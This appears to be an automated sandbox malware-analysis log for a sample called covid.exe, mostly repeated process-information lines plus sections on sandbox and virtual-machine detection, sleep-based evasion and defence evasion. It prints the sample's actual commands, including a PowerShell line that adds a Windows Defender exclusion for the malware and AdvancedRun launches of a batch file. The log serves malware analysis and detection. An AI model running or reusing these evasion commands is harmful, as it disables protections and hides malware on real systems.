Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)Show sources
Source: C:\Users\user\Desktop\covid.exeWMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\covid.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\covid.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmmouse.sysJump to behavior
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: IdentifierJump to behavior
Source: C:\Users\user\Desktop\covid.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\vmhgfs.sysJump to behavior
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\covid.exeFile opened / queried: C:\WINDOWS\SysWOW64\drivers\VBoxMouse.sysJump to behavior
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
Source: C:\Users\user\Desktop\covid.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\covid.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4853Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2097Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5103Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2140Jump to behavior
Source: C:\Users\user\Desktop\covid.exe TID: 5756Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\covid.exe TID: 5744Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6336Thread sleep count: 4853 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep count: 52 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6340Thread sleep count: 2097 > 30Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6980Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968Thread sleep time: -13835058055282155s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\covid.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\covid.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000010.00000003.423793477.0000000004F7B000.00000004.00000001.sdmpBinary or memory string: Hyper-V
Source: powershell.exe, 00000010.00000003.423793477.0000000004F7B000.00000004.00000001.sdmpBinary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: covid.exe, 00000000.00000003.236324097.0000000005B2B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW*L
Source: covid.exe, 00000000.00000003.236350637.0000000000C2F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: AdvancedRun.exe, 00000005.00000002.281611272.0000000000628000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0040289F
Source: C:\Users\user\Desktop\covid.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\covid.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Adds a directory exclusion to Windows DefenderShow sources
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -Force
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -ForceJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -ForceJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeCode function: 5_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,5_2_00401C26
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -ForceJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\covid.exe' -ForceJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
Source: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /SpecialRun 4101d8 3192Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /SpecialRun 4101d8 6224
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4103631a-1d7c-4a39-96f5-57019040d0ec\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
Source: C:\Users\user\Desktop\covid.exeProcess created: C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe 'C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe' /EXEFilename 'C:\Users\user\Desktop\covid.exe' /WindowState ''1'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Users\user\Desktop\covid.exe VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\covid.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
